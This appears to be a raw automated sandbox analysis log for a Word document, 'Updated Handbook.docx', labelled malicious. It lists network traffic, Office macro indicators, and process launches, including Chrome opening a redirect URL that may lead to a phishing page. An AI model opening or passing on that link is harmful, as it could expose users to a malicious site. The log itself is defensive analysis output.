Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
Source: unknownNetwork traffic detected: HTTP traffic on port 50639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
Source: unknownNetwork traffic detected: HTTP traffic on port 51335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
Source: unknownHTTPS traffic detected: 52.123.243.83:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49866 version: TLS 1.2
Source: CatalogCacheMetaData.xml.0.drOLE indicator, VBA macros: true
Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: gostname.xsl.0.drOLE indicator, VBA macros: true
Source: sist02.xsl.0.drOLE indicator, VBA macros: true
Source: iso690.xsl.0.drOLE indicator, VBA macros: true
Source: turabian.xsl.0.drOLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: chicago.xsl.0.drOLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
Source: gb.xsl.0.drOLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{53A35962-5A75-4BE3-BD85-4F99F5B87E13}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal48.winDOCX@29/1785@269/96
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E525282F-F148-49F6-8DDB-A7A3A7208FEF} - OProcSessId.datJump to behavior
Source: Updated Handbook.docxOLE indicator, Word Document stream: true
Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRF{53A35962-5A75-4BE3-BD85-4F99F5B87E13}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{53A35962-5A75-4BE3-BD85-4F99F5B87E13}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{53A35962-5A75-4BE3-BD85-4F99F5B87E13}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://redirect.aecdaily.com/s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1816,i,3842482353412426924,4138602321115753140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1816,i,3842482353412426924,4138602321115753140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Templates.LNK.0.drLNK file: ..\..\Templates
Source: Updated Handbook.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Updated Handbook.docx
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Updated Handbook.docxInitial sample: OLE zip file path = word/_rels/footnotes.xml.rels
Source: Updated Handbook.docxInitial sample: OLE zip file path = word/comments.xml
Source: Updated Handbook.docxInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Updated Handbook.docxInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
